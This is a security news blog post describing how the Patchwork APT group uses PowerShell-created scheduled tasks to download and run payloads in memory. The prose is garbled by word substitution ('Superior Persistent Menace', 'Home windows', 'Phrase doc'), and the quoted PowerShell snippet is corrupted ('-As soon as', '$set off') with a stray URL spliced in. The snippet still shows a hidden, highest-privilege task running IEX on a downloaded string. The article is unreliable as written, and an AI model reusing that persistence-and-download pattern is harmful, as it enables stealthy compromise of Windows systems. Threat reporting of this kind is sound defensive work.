Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Patchwork APT Using PowerShell Commands to Create Scheduled Task and Downloads Final Payload

Posted on October 1, 2025October 1, 2025 By CWS

Since mid-2025, cybersecurity researchers have tracked a resurgence of Patchwork Superior Persistent Menace (APT) campaigns concentrating on authorities and telecommunications sectors throughout Asia and Japanese Europe.

Initially leveraging spear-phishing emails containing malicious Workplace doc attachments, this newest wave of exercise has advanced right into a multi-stage an infection chain using subtle persistence and payload retrieval techniques.

The preliminary intrusion sometimes begins when an unsuspecting person allows macros in a weaponized Phrase doc, triggering an embedded PowerShell script that silently reaches out to a command-and-control server.

From there, Patchwork’s operators set up a foothold, harvest credentials, and preserve long-term entry inside compromised networks.

In current weeks, K7 Safety Labs analysts famous that the PowerShell element chargeable for persistence had been enhanced with dynamic URL era and randomized scheduled process names to evade detection by endpoint monitoring options.

Analysts recognized a shift from static command URLs to a multi-URL failover mechanism, guaranteeing that if one obtain supply is blocked, subsequent makes an attempt nonetheless succeed.

This refinement underscores the group’s give attention to defeating typical network-based detection controls by distributing payload internet hosting throughout a number of compromised net servers.

The influence of those operations has ranged from credential theft to the deployment of customized distant entry instruments, enabling lateral motion and information exfiltration.

Victims report CPU spikes and anomalous outbound HTTP requests occurring at common intervals, indicative of scheduled process execution.

Gathering System data (Supply – K7 Safety Labs)

In a number of situations, the operators have deployed a last payload that leverages authentic Home windows binaries to load malicious DLLs into reminiscence, complicating forensic evaluation.

The noticed payloads differ from password-dumping utilities to bespoke C2 frameworks able to executing arbitrary instructions and staging extra modules on demand.

An infection Mechanism by way of Scheduled Duties

A deep dive into Patchwork’s an infection mechanism reveals the way it leverages native Home windows utilities to orchestrate its payload execution.

Upon execution of the preliminary PowerShell downloader, the malware generates a singular process title, usually resembling normal Home windows upkeep providers.

The next PowerShell snippet, recovered from an incident response log, illustrates the core of this persistence tactic:-

$set off = New-ScheduledTaskTrigger -As soon as -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30) -RepetitionDuration ([TimeSpan]::MaxValue)
$motion = New-ScheduledTaskAction -Execute “PowerShell.exe” -Argument “-NoProfile -WindowStyle Hidden -Command `”IEX ((New-Object Web.WebClient).DownloadString(‘
Register-ScheduledTask -TaskName “WindowsUpdateAgent-$(https://cybersecuritynews.com/?p=128525::NewGuid().ToString())” -Set off $set off -Motion $motion -RunLevel Highest

Powershell Script (Supply – K7 Safety Labs)

This scheduled process runs silently at frequent intervals, downloading and executing the ultimate payload with out writing information to disk.

The usage of Invoke-Expression (IEX) mixed with New-Object Web.WebClient permits the malware to stream scripts straight into reminiscence, bypassing file-based detection.

As soon as the secondary payload is loaded, the operators acquire full interactive entry by way of a customized backdoor, enabling credential harvesting and lateral motion.

By abusing authentic Home windows process scheduling and networking APIs, Patchwork APT efficiently blends into regular system exercise, posing vital challenges for defenders making an attempt to distinguish malicious habits from routine upkeep operations.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:APT, Commands, Create, Downloads, Final, Patchwork, Payload, PowerShell, Scheduled, Task

Post navigation

Previous Post: Canadian Airline WestJet Says Hackers Stole Customer Data
Next Post: Chinese APT ‘Phantom Taurus’ Targeting Organizations With Net-Star Malware

Related Posts

Why Threat Prioritization Is the Key SOC Performance Driver   Cyber Security News
Citrix Warns Authentication Failures Following The Update of NetScaler to Fix Auth Vulnerability Cyber Security News
SafePay Ransomware Claiming Attacks Over 73 Victim Organizations in a Single Month Cyber Security News
Mocha Manakin Using Paste and Run Technique to Trick Users Into Downloading Malicious Payloads Cyber Security News
New ClickFix Attack Uses Fake BBC News Page and Fraudulent Cloudflare Verification to Trick Users Cyber Security News
Top 10 Best API Security Testing Tools in 2025 Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News